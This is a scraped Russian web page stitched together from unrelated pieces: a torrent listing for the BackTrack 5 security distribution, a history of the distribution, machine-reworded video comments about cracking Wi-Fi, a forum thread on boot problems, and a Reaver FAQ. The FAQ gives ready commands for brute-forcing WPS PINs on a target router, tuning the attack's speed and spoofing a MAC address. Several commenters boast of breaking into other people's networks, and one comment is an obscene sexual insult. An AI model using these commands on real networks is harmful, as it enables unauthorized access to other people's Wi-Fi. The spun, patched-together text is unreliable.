Руководства, Инструкции, Бланки

Backtrack 5 R3 Rus инструкция по применению img-1

Backtrack 5 R3 Rus инструкция по применению

Категория: Инструкции

Описание

Скачать BackTrack 5 x86, x64, ARM (GNOME, KDE) (2011) ENG торрент без регистрации

Скачать BackTrack 5 x86,x64,ARM (GNOME,KDE) (2011)[ENG] торрент без регистрации

BackTrack 5 x86,x64,ARM (GNOME,KDE) (Все версии)
Год Выпуска. 2011
Версия. 5
Разработчик. Мати Ахарони, Макс Мозер, Remote-Exploit
Сайт разработчика. http://www.backtrack-linux.org/
Таблэтка. Не требуется
Язык интерфейса. Английский
Описание. Linux-дистрибутив BackTrack основан на Ubuntu Linux 10.04 LTS и интересен тем, что в его состав входит большое количество разнообразных инструментов, предназначенных для специалистов в области ИТ-безопасности. Среди них, например, Metasploit, Kismet, Nmap, Wireshark (ранее — Ethereal) и Ophrack, а также большая коллекция различных эксплоитов. При этом BackTrack, что особенно актуально для подобных дистрибутивов, не требует обязательной установки на жесткий диск и может работать в «живом» режиме (LiveCD / LiveUSB).
Данная версия BackTrack поставляется в виде ISO-образа и образа для VMWare. В специальных версиях для LiveUSB более нет необходимости, т.к. теперь установку на флешку легко произвести с помощью утилит типа Unetbootin или вручную (см. мануал). При использовании BackTrack на виртуальной машине нужно учитывать, что любое ПО для виртуализации может работать только с подключаемыми по USB беспроводными адаптерами как с физическими (реальными) устройствами.
В раздаче 6 образов:
BT5-GNOME-32.iso - оболочка GNOME, архитектура х86
BT5-GNOME-64.iso - оболочка GNOME, архитектура х64
BT5-GNOME-ARM.7z - оболочка GNOME, архитектура ARM
BT5-GNOME-VM-32.7z - оболочка GNOME, готовый образ для виртуальной машины (х86)
BT5-KDE-32.iso - оболочка KDE, архитектура х86
BT5-KDE-64.iso - оболочка KDE, архитектура х64
[spoiler=" MD5 "]
BT5-GNOME-32.iso MD5: b01a93a916fabb6d1640bd0054428e17
BT5-GNOME-64.iso MD5: 75c4e7a969abc873d9e085656b156345
BT5-GNOME-ARM.7z MD5: a66bf35409f4458ee7f35a77891951eb
BT5-GNOME-VM-32.7z MD5: 75d22c92c0188fb6af761f0de1c67399
BT5-KDE-32.iso MD5: 4150643026d292717f77ebb83948a034
BT5-KDE-64.iso MD5: 80d65610de90ac7ede49b9f7935dfdd2[/spoiler]

Скачать BackTrack.5.x86.x64.ARM.(GNOME.KDE).(2011)[ENG].torrent без регистрации

ЗОЛОТАЯ РАЗДАЧА! СКАЧАННОЕ НЕ ЗАСЧИТЫВАЕТСЯ!

Зарегистрирован [ Тип: внутренний ]

√ проверено DHT

торрент - 748 раз, раздача полностью - 245 раз

Страница 1 из 1

Список форумов goldenshara.org » Linux, Unix и другие OS » Операционные системы Linux, Unix

Вы не можете начинать темы
Вы не можете отвечать на сообщения
Вы не можете редактировать свои сообщения
Вы не можете удалять свои сообщения
Вы не можете голосовать в опросах
Вы не можете прикреплять файлы к сообщениям
Вы можете скачивать файлы

Based on TorrentPier © Shara, Meithar. RoadTrain, Pandora
Форум представлен на базе phpBB © phpBB Group

!ВНИМАНИЕ! (мобильная версия)
Сайт не предоставляет электронные версии произведений, а занимается лишь коллекционированием и каталогизацией ссылок, присылаемых и публикуемых на форуме нашими читателями. Файлы для обмена на трекере предоставлены пользователями сайта, и администрация не несёт ответственности за их содержание.

Другие статьи

BackTrack - это

BackTrack это:

BackTrack был создан на базе нескольких linux -дистрибутивов. Первоначально предназначался для использования на ОС slackware, а затем плавно перешёл на Ubuntu.

WHAX (название произошло от White Hat и SLAX ) был создан для проведения тестов на проникновения. Изначально базировался на Knoppix и назывался Whoppix. Однако после выхода версии 3, основанной на Slax был переименован в WHAX. Разрабатываемый израильским специалистом по информационной безопасности Мати Ахарони, WHAX делал основной акцент на тесты на проникновение. Дистрибутив делал возможным проверку безопасности с помощью компьютеров, расположенных в различных местах.

Auditor Security Collection

Макс Мозер называл Auditor Security Collection швейцарским ножом для оценки безопасности. Одинаковые цели этого дистрибутива и WHAX в конце концов привели к объединению. Он представлял более 300 инструментов в виде удобных графических меню. Эта дружелюбность к пользователю перекочевала и в BackTrack. Auditor Security Collection представлял собой liveCD. на базе knoppix.

Текущее состояние

После того, как дистрибутив начал стабильно развиваться и была налажена работа обратной связи с пользователями, производители сделали упор на расширение стабильности и функциональности, что изменило процесс разработки. В текущих версиях BackTrack большинство программ использованы в виде отдельных модулей, что упрощает процесс создания дополнений и исправлений.

Дистрибутив создан для тестировщиков информационной безопасности. Поставляется в виде LiveUSB и liveCD. от пользователя требуется только загрузиться с носителя содержащего BackTrack. Также есть возможность установки системы на жёсткий диск (требуется примерно 2,7 ГБ). В настоящее время в дистрибутив включены инструменты для программно-технической экспертизы. Также ведётся работа над поддержкой иероглифических азиатских языков.

Примечание. последние версии BackTrack поставляются в виде ISO-образа и образа для VMWare. В специальных версиях для LiveUSB более нет необходимости, т.к. теперь установку на флешку легко произвести с помощью утилит типа Unetbootin или вручную (см. руководство ). При использовании BackTrack на виртуальной машине нужно учитывать, что любое ПО для виртуализации может работать только с подключаемыми по USB беспроводными адаптерами как с физическими (реальными) устройствами.

Наиболее известные программы в пакете

Для удобства доступа к инструментам они разделены на 16 категорий

Так же в состав дистрибутива включены привычные для пользователей программы Mozilla Firefox. Pidgin. K3b. и XMMS .

Релиз-версии

Релиз BackTrack 2 был выпущен 6 марта 2007 года и включал в себя около 300 инструментов для проверки безопасности .

Бета-версия BackTrack 3 была выпущена 14 декабря 2007 года. Основной акцент в ней был сделан на поддержку большего количества оборудования и большую гибкость конфигурирования.

Релиз BackTrack 3 был выпущен 19 июня 2008 года. Туда был включён Saint, однако был убран Nessus. Версией ядра осталась 2.6.21.5.

Бета-версия BackTrack 4 была выпущена 11 февраля 2009 года. Здесь произошли наиболее значительные изменения за всю историю: дистрибутив стал базироваться на Debian

Смотреть что такое "BackTrack" в других словарях:

BackTrack — Basisdaten Entwickler Max Moser, Mati Aharoni, Martin J. Muench … Deutsch Wikipedia

BackTrack — Famille Distribution GNU/Linux Etat du projet en developpement Entreprise / Developpeur Remote Exploit / Mati Aharoni, Max Moser Etats des sources Logiciel libre et Open Source Derniere version stable … Wikipedia en Francais

Backtrack — BackTrack 3.0 Famille Distribution Linux Etat du projet en developpement … Wikipedia en Francais

Backtrack — may refer to:* Back Track, a first person shooter for the Game Boy Advance * BackTrack, a Linux distribution * Backtrack (1990 film), alternative name to Catchfire. a 1990 drama film * Backtrack (western novel), a 1965 western novel written by… … Wikipedia

backtrack — index retreat, withdraw Burton s Legal Thesaurus. William C. Burton. 2006 … Law dictionary

backtrack — (v.) retrace one s steps, figuratively, by 1896, from literal sense, with reference to hunted foxes, from BACK (Cf. back) (adv.) + TRACK (Cf. track) (v.). Related: Backtracked; backtracking … Etymology dictionary

backtrack — To deliver mail to a point that the letter carrier has mistakenly bypassed … Glossary of postal terms

backtrack — > VERB 1) retrace one s steps. 2) reverse one s previous position or opinion … English terms dictionary

backtrack — ? backtrack [bak?trak? ] vi. 1. to return by the same path 2. to withdraw from a position, attitude, etc … English World dictionary

Wi-fi взлом с помощью Backtrack 5 r3

wi-fi взлом с помощью Backtrack 5 r3

Утром все будет готово если wi-fi не выключат на ночь. В моей практике такое встречалось?

виктор милофф 2 years ago

Всё работает,испытано на KASENS 990WG. Только потом MAC адресса прописываю номер канала - у создателя это надлежит смотреться этак reaver -i mon0 -b мак-адресок -с1 -vv -L тогда не будет перебора каналов.Разницу по времени меж -a и -L не увидел.Чем меньше смысл RSSI тем резвее идет процесс--50 и меньше -12 часов взлома ?

TreiderTV 2 years ago

Почему бы попросту не перехватить хендшейк, а позже используя мощность видюхи, по словарю подогнуть пароль??

Андрей Ерещенко 1 year ago

та то понятно,однако не у каждого кушать вычислительные мощи CUDA.(у меня GTS450) Лично я этот метод изредка использую,в основном Reaver юзаю для вычисления wps pin.

TreiderTV 1 year ago

+Андрей Ерещенко ахах) Что означает не животрепещуще?) Hashcat'oм, конечно еще на оочень старенькой видюхе(GTX 465) -- 139 00 паролей/секунду. Очень благородный итог.

Андрей Ерещенко 1 year ago

Это не животрепещуще.Одной видюхой длительно.На серверах можно,однако если слова не будет в словаре то хрен сломаешь

Rammulito Game Channel 2 years ago

Метод пашет проверил на собственном модеме Asus RT N-16 wpa 2 больше 10 знаков латиницей разламывает за 5-6 часов, вот лишь для чего прибавлять параметр -L не ясно и без него работает.?

mrkermit1987 2 years ago

что дает -L в строке reaver -i mon0 -b 1C:BD:B9:B5:C6:B9 -vv -L обыкновенно же ставят -а автоматом определять характеристики взлома??

Doctorr GriFF 2 years ago

комманда reaver. ответит на все твои вопросы

нихрена не разламывает. блочит wps и все на этом завершается?

John Shown 2 years ago

создатель подскажите изволь какой у вас адаптер TP-Link ,и будто вы его подключили в vmware, у меня TP-Link TL-WN821NC однако он не определяется ни в виртуальной машине ни чрез биос при загрузке с флешки,буду весьма признателен если можете чем то посодействовать.?

Katar P 2 years ago

Можно будто-то чрез ноут??

Temptestlive 2 years ago

Здравствуйте, на данный момент я Вам желаю показать, продемонтрировать будто можно взломать wi - fi у себя дома)))) Что это за ХууууууuuuuuuuuHbaaaaaaaaахаххахах. я скажу для тебя проще что бы взломать пароль у себя дома, возьми номер контракта веба и просканируй его своим зрением ну-ка либо попроси что бы для тебя кто нибудь его прочел от корки до корки ;)?

Влад Кузьменко 1 year ago

+Temptestlive ухахахаахаххахаха!блядь насмешил от души!

John Bull 1 year ago

С новым годом и тебя))))

Дима Дмитров 1 year ago

+JZX Я больше чем уверен, что твой задница, лет с 8 распечатан, этак будто ты ищешь на разреженную свою дыру приключения, а точнее произнести, всё нового и нового партнёра, какой тебя будет драть будто последнюю шваль! Усёк, хуя глотающий люсёк!

John Bull 2 years ago

Ребята не ругайтесь, попросту если создателю этого видео дать компьютер с нагим Linux, он и драйвер поставить вряд ли, сумеет на эту систему. BackTrack и Kali посылает анонимную статистику всех действий разроботчикам, а они провайдеру, и если не желаете что б пришли к вам и постучали в дверь, позже опечатали Ваш системный блок и забрали его до вашего суда, учите для основы родимый и возлюбленный всеми MS-DOS для основы.

JZX 2 years ago

+Дима Дмитров для тебя походу это чувство знакомо, один ты знаешь его.

Женя Шишкин 2 years ago

кореш видео норм однако я ни чё не сообразил !?

Микола Сранадупа 2 years ago

Точка доступа - это и кушать WiFi роутер, раздающий и коммутирующий по эфиру и по кабелю! Автор видео - неуч перепутал точку доступа с юзерским адаптером WiFi личного использования!?

Иван Иванов 1 year ago

+Сандэй Адэладжа Точка доступа не вечно может быть WiFi роутером. Но вы верно произнесли, что сетвевая USB WiFi карта - это не точка доступа!

Данил Ващекин 2 years ago

Сколько обязан тянуть Backtrack 5 r3?(качаю 14 Гб с излишним.)?

Данил Ващекин 2 years ago

DarkPlaying 2 years ago

я ввёл команду airodump-ng mon0 и где написано BSSID не чего не выскакивает,пусто и всё что мастерить??

Sergey Punko 2 years ago

Спасибо,здорово,лишь нехорошо в новых роутерах WPS охрана включена ?

LeavemealoneUA 2 years ago

С ноутбука без наружной точки доступа не получится? Встроенный wi-fi модуль вроде же может принимать и рассматривать сигналы.?

brain hopper 2 years ago

Не нужно ни каких свистков!Просто запускаете с бут-флеш и всё!?

Улан Калкаманулы 2 years ago

бля у меня в этот один не вышло думаю это иза сеть?

Спасибо)Все супер)посторонний wi fi за 5 часов вызнал пароль))?

Moonspell Terion 2 years ago

Это дудки абсурд,а действительность. Одна из наилучших программ на мой взор это BT5 R3 разламывает и WEP и WPA-WPA2 при этом взлом WPA идёт перебором пинов. Никаких HANDSHAKE, это на мой взор вообщем лотерея. Тут видео по взлому+письменное объяснение+дополнительные описание+скрин-шоты и команды ускорения атаки, всё весьма тщательно и доступно, отменно изготовлено.Качайте на здоровье. ?

John Style 2 years ago

Нихера не сообразил.?

DeniskaNumOne 2 years ago

Пытаюсь подключить адаптер к вирт.машине,пишет the connection for usb device Atheros USB2.0 wlan was unsuccessful будто поправить??

Kamil Abbaszadeh 2 years ago

в конце строчки reaver можно еще прописать эти характеристики: -с X -f заместо X нужно подставить номер канала маршрутизатора жертвы, его можно отыскать в таблице отысканных точек доступа airodump-ng в отдельной колонке. это ускоряет процесс ассоциации с точкой, прога уже не будет исследовать все каналы по одному на присутствие beacon-пакетов жертвы, а сходу будет подключаться по фиксированному каналу. P.S. не советую трудиться с BackTrack-ом чрез виртуалку, лучше поставить ось на флешку и загружаться с нее когда нужно, ну-ка либо сходу на компьютер.?

ukramms 2 years ago

-vv -L -c 5 -f в конце этак к примеру ?

Сергей Вербицкий 2 years ago

А где эту прогу скачать можно??

KabaLua 2 years ago

А если у меня пароль из 13 знаков числа+буковкы сколько уйдёт времени??

feruz qodirov 1 year ago

А если у меня пароль из 13 знаков числа+буковкы сколько уйдёт времени? 12 знаков - 80 (латиница различного регистра плюс числа плюс знаки препинания.,;. плюс скобки ()[] плюс 0&*

) 217 908 031 год )))) Время полного перебора всех вероятных паролей данного алфавита при скорости перебора 10 000 000 паролей в секунду

EXO Chanyeol (D.O) 2 years ago

у меня не вышла устанавить ?

enjoYqq prod. 2 years ago

Я попросту не сообразил. У меня 2 адаптера на ноуте встроеных. однако ни одинешенек из их не виден. будто это поправить??

Rustam Haibullin 2 years ago

Всем кто решит сделать также будто в видео от всей души желаю терпенья! иии никого не слушайте. ЭТО НА САМОМ ДЕЛЕ РАБОТАЕТ. ?

Rustam Haibullin 2 years ago

Чувак(создатель видео) СПАСИБО. Я замучил полный иНет однако сссука сообразил будто трудиться с этой гадюкой(backtrack). Щас вот уже возле 3 процентов подбора пароля завершено. Только до сих пор не усвою отчего wash не работал, пришлось наобум wifi точку избирать)))?

DOKTOR LEKTOR 2 years ago

я этак где то читал бэк трэк работает лишь из под линекса?

Нет, это Wi-Fi-точка доступа (роутер). Она раздаёт веб. Атакуют будто один её либо подобные ей устройства.

SherkhaN 2 years ago

Мужики подскажите а вот идет reaver подбор пин кода там 1% подбирается за 23 минут. Я сбросил калькуляторам, и выходит что бы дойти до 100% уйдет больше 38 часов. Тоисть 2 денька. И этак появляется проблема что бы перебрать пин код обезательно надлежит дойти до 100%. ?

Markisi0 2 years ago

В версии Reaver 1.4 потом 5 либо 6 попыток он показывает сколько времени осталось. 2 денька займёт перебор в случае, когда пин кодом точки будет число 9998-998* Это последнее проверяемое смысл, если внезапно пин код найдётся ранее, то и времени затратится пропорционально меньше.

boni poni 2 years ago

Прежде чем что-то разъяснять, необходимо самому во всём разобраться, а не философствовать на ходу.У тебя в голове сплошная каша.?

Славик Сухин 2 years ago

Backtrack 5 r3 инструкция - Общая информация

Backtrack 5 r3 инструкция

Board ? ? ? ? ? ? » » » Kali Linux ранее BackTrack Модерирует :? ? Страницы: 4 Junior Member Kali Linux Разработчик: Документация: Где скачать: По умолчанию пароль для root пользователя toor Язык интерфейса: только английский Системные требования: RAM: 512 MB HDD: 10 GB Описание: Kali Linux является передовым Linux дистрибутивом для проведения тестирования на проникновение и аудита безопасности. Вся новая инфраструктура была пересмотрена, все инструменты были проанализированы и упакованы. Вам никогда, не придется платить за Kali Linux. Поддержка ARMEL и ARMHF: ARM-системы становятся все более и более распространенным и недорогими. Kali Linux имеет ARM репозитории интегрированные с основным дистрибутивом, так инструменты для ARM будут обновляться вместе с остальными дистрибутивами. Версии Backtrack сняты с поддержки. Всего записей: 79 Зарегистр. Там же во всех руководствах написано: нужно сначала осуществить фиктивную авторизацию, а затем использовать chop-chop или fragmentation attak. Скорость собирания пакетов возрастет на порядки. Цитата: как привести к нормальному виду. А зачем его к чему-то приводить? А вообще-то тема здесь: - Заслуженный SCOтовод, почетный SUNтехник и любитель Кошек Всего записей: 14933 Зарегистр. А то что-то глюковатый, то нормально всё - то ошибки выкидывает. Сам драйвер скачал - как в установить? Всего записей: 251 Зарегистр. Меня интересует словари, есть специальный словарь для вайфая? Там они под конкретное ядро собираются, ну или под ветку, так что. Использовать его через modprobe. Talay а в чём его специальность должна заключаться? Сгенерите сами с тем набором символов, который вам нужен. Утилит для этого в инете достаточно. I've been using Vim for about 4 years now, mostly because I can't figure out how to exit it. Всего записей: 5912 Зарегистр. Архив скачал, с помощью Universal USB Installer записал операционную систему на флешку 16 гб. Прошу, подскажите пожалуйста в чем проблема, спасибо. Всего записей: 2 Зарегистр. Закатал на DVD BT5R3-GNOME-32. При загрузке выбираю "Boot Text Mode" позднее опробованные другие опции исход не изменилизагрузка доходит до "root bt:

" - как я понимаю приглашения, а дальше строка самозаполняется нулями с частотой 2 в секунду. Esc - приостанавливает заполнение, любая другая клавиша - продолжает, причем адекватный клавишный символ высвечивается в строке, но потом - продолжаются те же нули. Не могу набрать ни одну команду - только 3-кнопочную та принимается и отрабатывается. Поиском в инете подобную ситуацию не нашел. Всего записей: 141 Зарегистр. Вывод с вводом пересекаются только для вас на экране, а не для машины, вполне можно набрать команду вслепую и нажать. Но это просто для справки. Последнюю обязательно попробуйте, конкретно допустим Ctrl-Alt-F2 — должны переключиться на другую консоль — что там? Тогда получал примерно такие отклики: 00 - command not found 000 - command not found Значит эти нули попадают и на ввод. Backspase визуально стирает нули быстрее, чем они появляются, но я не успею набрать несколько символов и Enter так, чтобы не вклинились нули. Есть такая 1-символьная команда, способная прояснить ситуацию? Поток нулей это не останавливало, но система выводила несколько строк, сообщающих о подготовке к завершению работы. The system is going down for reboot NOW! Вероятно действительно попадал в другую консоль и там - свой бесконечный поток нулей. То же и по Ctrl-Alt-F3, Ctrl-Alt-F4. Потом по Ctrl-Alt-F1 - возвращаюсь в исходную консоль и везде. Если это чем-то поможет, то поток визуально останавливается по Esc или Alt, при этом вместо root bt:

00000000000000000 вижу arg: 0 00000000000000000 нажатие на любую другую клавишу возвращает бесконечный поток root bt:

00000000000000000 Проверил на работе на рабочем компе оба диска с r2 и r3 - нет такой проблемы. Система остается в ожидании моих команд. Давал help и startx - отрабатывала. Еще проверил на чужом ноуте Lenovo G570 - тоже нет такой беды. Не работает только там, где эта система нужна - на домашнем компе. Материнка - Gigabyte i848P. Какой-то конфликт BT с контроллером клавиатуры. Да, еще проверил на своем нетбуке Lenovo IdeaPad S10-3C. У него нет DVD, поэтому подключал внешний через переходник IDE-USB. Никакой реакции ни на какие клавиши. Тут и Ctrl-Alt-Del не помогал. В общем 2 компа, где BT нужен его грузить не дают, а 2 тестовых - пожалуйста. Всего записей: 141 Зарегистр. Всего записей: 332 Зарегистр. Есть ли в природе LiveCD с ними и есть ли смысл для прояснения ситуации с моим компом пытаться загрузиться таким образом? Если да, то попробую оперативно. Устанавливать незнакомую систему на диск мне будет посложнее. С помощью UNetbootin USB Installer сделал такую флеш. Вроде все правильно, но загрузиться не смог. На ноуте Lenovo G570 при загрузке была одна строчка про Линукс, но на ней процесс и останавливался. Этот чужой ноут пришлось отдать. Дальше пробовал на своем Lenovo IdeaPad S10-3C, но тут сразу получал сообщение про недоступный Boot Device. Вообще загрузочную флешку раньше не делал, вот и первый блин комом. Пока на свой Gigabyte i848P смог подключить к WMWare в WinXPsp3 ISO образ BT5 r3. У меня есть предположение, которое из-за неграмотности в Линуксе не знаю как проверить. При загрузке с диска BT есть несколько опций выбора, которые даже можно оперативно редактировать. Если предположить, что BT почему-то не может правильно работать с контроллером клавиатуры Gigabyte i848P, можно ли ему как-то помочь через эти опции с какими-то ключами? Всего записей: 141 Зарегистр. Был даже тем,кто совершает подвиги. Всего записей: 382 Зарегистр. Без урезания функционала его никак не ужать, флешку надо больше брать. Всего записей: 206 Зарегистр. Всего записей: 382 Зарегистр. У них в факе пишут что-то, что не стоит вроде Всего записей: 206 Зарегистр. Был даже тем,кто совершает подвиги. Всего записей: 382 Зарегистр. Всего записей: 332 Зарегистр. Ещё некоторая часть пользователей читает LoR и Opennet. I've been using Vim for about 4 years now, mostly because I can't figure out how to exit it. Всего записей: 5912 Зарегистр. Опции сообщения Добавить свою подпись Подписаться на получение ответов по e-mail Добавить тему в Разрешить Запретить.

Reaver FAQ

Обсуждения

Инструкции по использованию Reaver или просто Reaver FAQ, а так же опыт из личной жизни. Так что, если есть чем поделиться, пишите.

вы должны работать в Linux

у вас должна быть беспроводная карта способная к инъекциям (raw injection), например ALFA AWUS036H
беспроводная карта должна быть переведена в режим “монитора” (monitor mode)

Убедитесь, что ваша wifi-карта переведена в режим “монитора” (monitor mode):

airmon-ng start wlan0

Для запуска Reaver, необходимо указать BSSID целевой АР и имя интерфейса, который находится в режиме “монитора” (обычно “mon0?, а не “wlan0?, хотя это будет зависеть от типа беспроводной карты/драйверов):

reaver -i mon0 -b 00:01:02:03:04:05

Для получения более подробной информации используйте -vv:

reaver -i mon0 -b 00:01:02:03:04:05 -vv

Канал и SSID (при условии, что SSID не скрыта) атакуемой АР автоматически определяются Reaver’ом. Но их можно явно указать в команде:

reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys

По умолчанию, если АР переключает каналы (switches channels), reaver тоже будет это делать. Тем не менее, эта опция будет отключена, если явно указать канал АР:

reaver -i mon0 -b 00:01:02:03:04:05 —fixed

Увеличение скорости атаки

По умолчанию период получения тайм-аута (timeout) равен 5 секундам. Но период тайм-аута (timeout) можно уставить вручную (минимальный срок ожидания = 1 сек.):

reaver -i mon0 -b 00:01:02:03:04:05 -t 2

По умолчанию, перед отсылкой очередного pin’a AP, reaver производит задержку, которая равна 1 секунде. Эту задержку можно отключить, воспользовавшись опцией -d 0. Однако некоторым АР будет все равно, но попробовать все таки стоит:

reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Другой вариант, который может ускорить атаку, опция –dh-small. Опция “говорит” raever’y использовать не большие секретные/скрытые номера Диффи-Хеллмана в целях снижения вычислительной нагрузки на целевую AP:

reaver -i mon0 -b 00:01:02:03:04:05 -vv —dh-small

Некоторые АР, при обнаружении подозрительной активности, будут блокировать WPS на 5 минут или меньше. По умолчанию, когда WPS заблокирована, reaver будет проводить проверку состояния WPS на АР, которая составляет 315 секунд (5 минут и 15 секунд). Следовательно перебор пинов будет приостановлен. Эту проверку можно увеличить/уменьшить на любое не отрицательное число:

reaver -i mon0 -b 00:01:02:03:04:05 —lock-delay=250

По умолчанию период получения M5 и M7 сообщений от WPS составляет 0.1 сек. Если необходимо, период получения этих сообщений можно указать вручную (максимальный период равен 1 секунде):

reaver -i mon0 -b 00:01:02:03:04:05 -T .5

Большинству АР не нужно, но иногда необходимо, посылать EAP FAIL сообщения для закрытия WPS сессии. По умолчанию эта опция выключена, однако ее можно включить след. командой:

reaver -i mon0 -b 00:01:02:03:04:05 —eap-terminate

Когда WPS получает последовательно 10 “неожиданных” ошибок, то появляются предупреждающие сообщения. Это может быть признаком того, что АР ограничена по скорости перебора pin-кодов или она просто перегружена. Таким образом можно указать reaver’у, чтобы он перешел в сонный режим, если эти ошибки будут появляться:

reaver -i mon0 -b 00:01:02:03:04:05 —fail-wait=360

В некоторых случаях нужно или вы просто так хотите использовать поддельный MAC-адрес. Reaver поддерживает MAC spoofing благодаря опции –mac. Но для начала вы должны правильно подделать MAC-адрес.

Изменение MAC-адреса на виртуальном интерфейсе (например mon0), который включен в режим “монитора” (monitor mode) не правильно. Нужно изменить MAC-адрес на физическом интерфейсе! Например:

ifconfig wlan0 down
ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -b 00:01:02:03:04:05 -vv —mac=00:BA:AD:BE:EF:69

Статья в тему. Автору респект. Я сам сейчас юзаю эту тему. Я попробовал это на своей вайфай сети. На поиск пароля из восьми единиц у меня ушло почти 24 часа. И если ломать чужую сеть, которую иногда отключают это не актуально.
Костя может ты знаешь как в ривер сделать докачку? Если сеть отключили? Собранные данные ведь сохранились. Как их докачать на следующий день.
ОТВЕТЬ ПОЖАЛУЙСТА если не сложно!!!

Юрий. ctrl+c тебе в помощь, сессия сохраняется, потом спросит продолжить старую, нажмешь у и будет тебе радость, проверенно, во время перебора отпала антенна, пришлось остановить, подпаять заново антенну, и продолжить, утром я узнал заветные цифры, которые словарем перебирал бы неделю. там все просто, если что стучи в лс, разберемся)))